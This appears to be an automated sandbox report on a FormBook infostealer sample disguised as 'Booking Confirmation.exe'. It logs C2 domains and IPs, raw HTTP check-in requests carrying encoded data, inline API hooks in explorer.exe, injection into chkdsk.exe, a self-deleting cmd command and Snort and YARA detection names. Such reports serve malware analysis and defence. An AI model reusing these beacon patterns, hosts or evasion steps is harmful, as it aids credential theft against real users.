                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Version Infos

                                              DescriptionData
                                              Translation0x0000 0x04b0
                                              LegalCopyrightCopyright 2018
                                              Assembly Version1.0.0.0
                                              InternalNameIConnectionPoint.exe
                                              FileVersion1.0.0.0
                                              CompanyName
                                              LegalTrademarks
                                              Comments
                                              ProductNameRegisterVB
                                              ProductVersion1.0.0.0
                                              FileDescriptionRegisterVB
                                              OriginalFilenameIConnectionPoint.exe

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              02/23/21-09:38:51.562647TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.434.102.136.180
                                              02/23/21-09:38:51.562647TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.434.102.136.180
                                              02/23/21-09:38:51.562647TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.434.102.136.180
                                              02/23/21-09:38:51.702716TCP1201ATTACK-RESPONSES 403 Forbidden804976434.102.136.180192.168.2.4

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Feb 23, 2021 09:37:49.125511885 CET4975980192.168.2.481.169.149.11
                                              Feb 23, 2021 09:37:49.178277969 CET804975981.169.149.11192.168.2.4
                                              Feb 23, 2021 09:37:49.178462029 CET4975980192.168.2.481.169.149.11
                                              Feb 23, 2021 09:37:49.178663015 CET4975980192.168.2.481.169.149.11
                                              Feb 23, 2021 09:37:49.232486963 CET804975981.169.149.11192.168.2.4
                                              Feb 23, 2021 09:37:49.254631042 CET804975981.169.149.11192.168.2.4
                                              Feb 23, 2021 09:37:49.254662037 CET804975981.169.149.11192.168.2.4
                                              Feb 23, 2021 09:37:49.254834890 CET4975980192.168.2.481.169.149.11
                                              Feb 23, 2021 09:37:49.254900932 CET4975980192.168.2.481.169.149.11
                                              Feb 23, 2021 09:37:49.307396889 CET804975981.169.149.11192.168.2.4
                                              Feb 23, 2021 09:38:10.061094046 CET4976080192.168.2.4185.175.200.247
                                              Feb 23, 2021 09:38:10.113087893 CET8049760185.175.200.247192.168.2.4
                                              Feb 23, 2021 09:38:10.113182068 CET4976080192.168.2.4185.175.200.247
                                              Feb 23, 2021 09:38:10.113603115 CET4976080192.168.2.4185.175.200.247
                                              Feb 23, 2021 09:38:10.165286064 CET8049760185.175.200.247192.168.2.4
                                              Feb 23, 2021 09:38:10.166449070 CET8049760185.175.200.247192.168.2.4
                                              Feb 23, 2021 09:38:10.166481972 CET8049760185.175.200.247192.168.2.4
                                              Feb 23, 2021 09:38:10.166639090 CET4976080192.168.2.4185.175.200.247
                                              Feb 23, 2021 09:38:10.166727066 CET4976080192.168.2.4185.175.200.247
                                              Feb 23, 2021 09:38:10.218425989 CET8049760185.175.200.247192.168.2.4
                                              Feb 23, 2021 09:38:30.565995932 CET4976380192.168.2.4156.227.187.201
                                              Feb 23, 2021 09:38:30.916510105 CET8049763156.227.187.201192.168.2.4
                                              Feb 23, 2021 09:38:30.918800116 CET4976380192.168.2.4156.227.187.201
                                              Feb 23, 2021 09:38:30.918850899 CET4976380192.168.2.4156.227.187.201
                                              Feb 23, 2021 09:38:31.270864010 CET8049763156.227.187.201192.168.2.4
                                              Feb 23, 2021 09:38:31.277004004 CET8049763156.227.187.201192.168.2.4
                                              Feb 23, 2021 09:38:31.277348042 CET4976380192.168.2.4156.227.187.201
                                              Feb 23, 2021 09:38:31.277414083 CET4976380192.168.2.4156.227.187.201
                                              Feb 23, 2021 09:38:31.627831936 CET8049763156.227.187.201192.168.2.4

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Feb 23, 2021 09:36:33.365729094 CET6464653192.168.2.48.8.8.8
                                              Feb 23, 2021 09:36:33.401702881 CET6529853192.168.2.48.8.8.8
                                              Feb 23, 2021 09:36:33.414359093 CET53646468.8.8.8192.168.2.4
                                              Feb 23, 2021 09:36:33.450438023 CET53652988.8.8.8192.168.2.4
                                              Feb 23, 2021 09:36:34.358023882 CET5912353192.168.2.48.8.8.8
                                              Feb 23, 2021 09:36:34.406892061 CET53591238.8.8.8192.168.2.4
                                              Feb 23, 2021 09:36:35.323983908 CET5453153192.168.2.48.8.8.8
                                              Feb 23, 2021 09:36:35.375597000 CET53545318.8.8.8192.168.2.4
                                              Feb 23, 2021 09:36:36.211026907 CET4971453192.168.2.48.8.8.8
                                              Feb 23, 2021 09:36:36.259768009 CET53497148.8.8.8192.168.2.4
                                              Feb 23, 2021 09:36:37.460362911 CET5802853192.168.2.48.8.8.8
                                              Feb 23, 2021 09:36:37.466555119 CET5309753192.168.2.48.8.8.8
                                              Feb 23, 2021 09:36:37.508991003 CET53580288.8.8.8192.168.2.4
                                              Feb 23, 2021 09:36:37.528747082 CET53530978.8.8.8192.168.2.4
                                              Feb 23, 2021 09:36:49.565480947 CET4925753192.168.2.48.8.8.8
                                              Feb 23, 2021 09:36:49.614151955 CET53492578.8.8.8192.168.2.4
                                              Feb 23, 2021 09:36:50.378268003 CET6238953192.168.2.48.8.8.8
                                              Feb 23, 2021 09:36:50.430069923 CET53623898.8.8.8192.168.2.4
                                              Feb 23, 2021 09:36:51.610858917 CET4991053192.168.2.48.8.8.8
                                              Feb 23, 2021 09:36:51.659547091 CET53499108.8.8.8192.168.2.4
                                              Feb 23, 2021 09:36:52.969223022 CET5585453192.168.2.48.8.8.8
                                              Feb 23, 2021 09:36:53.020847082 CET53558548.8.8.8192.168.2.4
                                              Feb 23, 2021 09:36:53.968452930 CET6454953192.168.2.48.8.8.8
                                              Feb 23, 2021 09:36:54.019956112 CET53645498.8.8.8192.168.2.4
                                              Feb 23, 2021 09:36:54.753613949 CET6315353192.168.2.48.8.8.8
                                              Feb 23, 2021 09:36:54.802546024 CET53631538.8.8.8192.168.2.4
                                              Feb 23, 2021 09:36:56.450119972 CET5299153192.168.2.48.8.8.8
                                              Feb 23, 2021 09:36:56.498850107 CET53529918.8.8.8192.168.2.4
                                              Feb 23, 2021 09:36:58.389504910 CET5370053192.168.2.48.8.8.8
                                              Feb 23, 2021 09:36:58.451144934 CET53537008.8.8.8192.168.2.4
                                              Feb 23, 2021 09:36:59.244559050 CET5172653192.168.2.48.8.8.8
                                              Feb 23, 2021 09:36:59.296053886 CET53517268.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:00.205465078 CET5679453192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:00.255317926 CET53567948.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:07.391791105 CET5653453192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:07.440401077 CET53565348.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:19.035537958 CET5662753192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:19.087325096 CET53566278.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:20.023345947 CET5662153192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:20.072021961 CET53566218.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:21.322374105 CET6311653192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:21.371100903 CET53631168.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:22.515489101 CET6407853192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:22.567611933 CET53640788.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:28.024101019 CET6480153192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:28.081237078 CET53648018.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:31.836255074 CET6172153192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:31.898824930 CET53617218.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:33.834634066 CET5125553192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:33.908302069 CET53512558.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:34.645555973 CET6152253192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:34.705548048 CET53615228.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:35.134004116 CET5233753192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:35.196948051 CET53523378.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:35.743684053 CET5504653192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:35.800733089 CET53550468.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:36.325404882 CET4961253192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:36.382463932 CET53496128.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:36.594090939 CET4928553192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:36.665523052 CET53492858.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:36.963715076 CET5060153192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:37.012460947 CET53506018.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:37.777667046 CET6087553192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:37.836175919 CET53608758.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:38.772792101 CET5644853192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:38.831108093 CET53564488.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:39.264177084 CET5917253192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:39.322266102 CET53591728.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:46.320043087 CET6242053192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:46.378277063 CET53624208.8.8.8192.168.2.4
                                              Feb 23, 2021 09:37:49.056421041 CET6057953192.168.2.48.8.8.8
                                              Feb 23, 2021 09:37:49.118174076 CET53605798.8.8.8192.168.2.4
                                              Feb 23, 2021 09:38:09.971204042 CET5018353192.168.2.48.8.8.8
                                              Feb 23, 2021 09:38:10.059891939 CET53501838.8.8.8192.168.2.4
                                              Feb 23, 2021 09:38:21.682096004 CET6153153192.168.2.48.8.8.8
                                              Feb 23, 2021 09:38:21.730724096 CET53615318.8.8.8192.168.2.4
                                              Feb 23, 2021 09:38:23.595087051 CET4922853192.168.2.48.8.8.8
                                              Feb 23, 2021 09:38:23.652355909 CET53492288.8.8.8192.168.2.4
                                              Feb 23, 2021 09:38:30.350929976 CET5979453192.168.2.48.8.8.8
                                              Feb 23, 2021 09:38:30.564515114 CET53597948.8.8.8192.168.2.4
                                              Feb 23, 2021 09:38:51.433300018 CET5591653192.168.2.48.8.8.8
                                              Feb 23, 2021 09:38:51.520318985 CET53559168.8.8.8192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Feb 23, 2021 09:37:49.056421041 CET192.168.2.48.8.8.80x589eStandard query (0)www.buehne.cloudA (IP address)IN (0x0001)
                                              Feb 23, 2021 09:38:09.971204042 CET192.168.2.48.8.8.80x43adStandard query (0)www.praktijkinfinity.onlineA (IP address)IN (0x0001)
                                              Feb 23, 2021 09:38:30.350929976 CET192.168.2.48.8.8.80x312Standard query (0)www.localmoversuae.comA (IP address)IN (0x0001)
                                              Feb 23, 2021 09:38:51.433300018 CET192.168.2.48.8.8.80xcc80Standard query (0)www.merzigomusic.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Feb 23, 2021 09:37:49.118174076 CET8.8.8.8192.168.2.40x589eNo error (0)www.buehne.cloudbuehne.cloudCNAME (Canonical name)IN (0x0001)
                                              Feb 23, 2021 09:37:49.118174076 CET8.8.8.8192.168.2.40x589eNo error (0)buehne.cloud81.169.149.11A (IP address)IN (0x0001)
                                              Feb 23, 2021 09:38:10.059891939 CET8.8.8.8192.168.2.40x43adNo error (0)www.praktijkinfinity.online185.175.200.247A (IP address)IN (0x0001)
                                              Feb 23, 2021 09:38:30.564515114 CET8.8.8.8192.168.2.40x312No error (0)www.localmoversuae.com156.227.187.201A (IP address)IN (0x0001)
                                              Feb 23, 2021 09:38:51.520318985 CET8.8.8.8192.168.2.40xcc80No error (0)www.merzigomusic.commerzigomusic.comCNAME (Canonical name)IN (0x0001)
                                              Feb 23, 2021 09:38:51.520318985 CET8.8.8.8192.168.2.40xcc80No error (0)merzigomusic.com34.102.136.180A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.buehne.cloud
                                              • www.praktijkinfinity.online
                                              • www.localmoversuae.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.44975981.169.149.1180C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Feb 23, 2021 09:37:49.178663015 CET5031OUTGET /ffw/?MZg8=i2wbx/M7rrWGhnBeYdMUQ+oEsm11dU48NWkvE2U6RCUjjqrjMq6tqVdU8V2lO/H9m4oS&uTxXc=ojO0dJK0Hv HTTP/1.1
                                              Host: www.buehne.cloud
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Feb 23, 2021 09:37:49.254631042 CET5033INHTTP/1.1 302 Found
                                              Date: Tue, 23 Feb 2021 08:37:49 GMT
                                              Server: Apache/2.4.29 (Ubuntu)
                                              Location: https://buehne.cloud/ffw/?MZg8=i2wbx/M7rrWGhnBeYdMUQ+oEsm11dU48NWkvE2U6RCUjjqrjMq6tqVdU8V2lO/H9m4oS&uTxXc=ojO0dJK0Hv
                                              Content-Length: 386
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 75 65 68 6e 65 2e 63 6c 6f 75 64 2f 66 66 77 2f 3f 4d 5a 67 38 3d 69 32 77 62 78 2f 4d 37 72 72 57 47 68 6e 42 65 59 64 4d 55 51 2b 6f 45 73 6d 31 31 64 55 34 38 4e 57 6b 76 45 32 55 36 52 43 55 6a 6a 71 72 6a 4d 71 36 74 71 56 64 55 38 56 32 6c 4f 2f 48 39 6d 34 6f 53 26 61 6d 70 3b 75 54 78 58 63 3d 6f 6a 4f 30 64 4a 4b 30 48 76 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 65 68 6e 65 2e 63 6c 6f 75 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://buehne.cloud/ffw/?MZg8=i2wbx/M7rrWGhnBeYdMUQ+oEsm11dU48NWkvE2U6RCUjjqrjMq6tqVdU8V2lO/H9m4oS&amp;uTxXc=ojO0dJK0Hv">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.buehne.cloud Port 80</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.449760185.175.200.24780C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Feb 23, 2021 09:38:10.113603115 CET6257OUTGET /ffw/?MZg8=QtqTw2GyYxf2WyRFtpmSmJJvhnrw03uNROtSydYnJk3JDRiYk6bsvXWgtuf5tlEJcMN+&uTxXc=ojO0dJK0Hv HTTP/1.1
                                              Host: www.praktijkinfinity.online
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Feb 23, 2021 09:38:10.166449070 CET6258INHTTP/1.1 404 Not Found
                                              Date: Tue, 23 Feb 2021 08:38:10 GMT
                                              Server: Apache/2
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Accept-Ranges: bytes
                                              Vary: Accept-Encoding,User-Agent
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html
                                              Data Raw: 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 0d 0a 38 62 0d 0a 2f 66 66 77 2f 3f 4d 5a 67 38 3d 51 74 71 54 77 32 47 79 59 78 66 32 57 79 52 46 74 70 6d 53 6d 4a 4a 76 68 6e 72 77 30 33 75 4e 52 4f 74 53 79 64 59 6e 4a 6b 33 4a 44 52 69 59 6b 36 62 73 76 58 57 67 74 75 66 35 74 6c 45 4a 63 4d 4e 2b 26 61 6d 70 3b 75 54 78 58 63 3d 6f 6a 4f 30 64 4a 4b 30 48 76 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 0d 0a 31 32 62 0d 0a 77 77 77 2e 70 72 61 6b 74 69 6a 6b 69 6e 66 69 6e 69 74 79 2e 6f 6e 6c 69 6e 65 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 90<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL 8b/ffw/?MZg8=QtqTw2GyYxf2WyRFtpmSmJJvhnrw03uNROtSydYnJk3JDRiYk6bsvXWgtuf5tlEJcMN+&amp;uTxXc=ojO0dJK0Hv was not found on this server.<HR><I>12bwww.praktijkinfinity.online</I></BODY></HTML>0


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.449763156.227.187.20180C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Feb 23, 2021 09:38:30.918850899 CET6278OUTGET /ffw/?MZg8=vCSLLgJGCp79MzLYydBa+Bsk3bm2BxHz5ofTxOlO5FwRAAdXOpMXkN2jq+v+BBk+R2pe&uTxXc=ojO0dJK0Hv HTTP/1.1
                                              Host: www.localmoversuae.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function NameHook TypeNew Data
                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE0
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE0
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE0
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE0

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Start time:09:36:40
                                              Start date:23/02/2021
                                              Path:C:\Users\user\Desktop\Booking Confirmation.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Booking Confirmation.exe'
                                              Imagebase:0x2c0000
                                              File size:510976 bytes
                                              MD5 hash:78D9EADC9FCC580239B360FFA2C2220F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:09:36:50
                                              Start date:23/02/2021
                                              Path:C:\Users\user\Desktop\Booking Confirmation.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\Desktop\Booking Confirmation.exe
                                              Imagebase:0x2d0000
                                              File size:510976 bytes
                                              MD5 hash:78D9EADC9FCC580239B360FFA2C2220F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low

                                              General

                                              Start time:09:36:50
                                              Start date:23/02/2021
                                              Path:C:\Users\user\Desktop\Booking Confirmation.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\Booking Confirmation.exe
                                              Imagebase:0xdc0000
                                              File size:510976 bytes
                                              MD5 hash:78D9EADC9FCC580239B360FFA2C2220F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:09:36:52
                                              Start date:23/02/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0x7ff6fee60000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:09:37:05
                                              Start date:23/02/2021
                                              Path:C:\Windows\SysWOW64\chkdsk.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                              Imagebase:0x2e0000
                                              File size:23040 bytes
                                              MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Start time:09:37:10
                                              Start date:23/02/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\Desktop\Booking Confirmation.exe'
                                              Imagebase:0x11d0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:09:37:11
                                              Start date:23/02/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff724c50000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >